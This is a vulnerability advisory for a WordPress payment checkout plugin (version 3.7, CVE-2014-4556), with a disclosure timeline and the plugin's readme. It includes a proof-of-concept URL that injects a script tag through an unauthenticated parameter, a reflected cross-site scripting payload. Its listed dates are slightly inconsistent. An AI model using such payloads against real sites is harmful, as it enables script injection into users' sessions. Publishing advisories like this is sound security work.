wp-plugin : swipe-hq-checkout-for-eshop

Plugin Details
Plugin Name: wp-plugin : swipe-hq-checkout-for-eshop
Effected Version : 3.7 (and most probably lower version's if any)
Vulnerability :
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/swipehqcheckoutforeshop/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%284%29%3C/script%3E


Disclosure Timeline
Vendor Contacted : 2014-01-20
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4556
Plugin Description :
[| in Version: 3.7.0 / 23 Sep 2013 Copyright: (c) 2012-2013, Optimizer Ltd. Link: http://www.swipehq.com/checkout/ REQUIREMENTS --- * Swipe account * Wordpress * Wordpress eShop plugin INSTALLATION --- 1. Please install this plugin through the normal Wordpress installation process (Plugins -> Add New, then Search or Upload) 2. After successful installation it will appear in the list of Plugins as "Swipe Checkout for eShop", make sure to Activate the plugin 3. Then configure Swipe, in the Plugins list, for Swipe Checkout, click on the Settings link, then add the following details from your Swipe Merchant login under Settings -> API Credentials: Swipe Merchant ID Swipe API Key Swipe API Url Swipe Payment Page Url 4. All done, test it out, add some products to your cart and you will get the option to pay with Swipe. NOTES --- * This plugin must be configured to use a currency that your Swipe Merchant Account supports, see Settings -> API Credentials for a list of currencies your Merchant Account supports. And see your settings for this plugin to see which currency it is using. CHANGE LOG --- 1.0 - First Public Release. 1.0 - First Public Release. 2.0 - Test Mode Compatibility - Automatically Sets LPN and Redirect URL 3.0.0 - Fixed potential issues for concurrent transactions - Minor plugin enhancements 3.5.0 - Multi-currency Support - Multi-region support 3.6.0 - Cleanup - Adding link to plugin settings from Plugins page 3.7.0 - Added check configuration test butto ]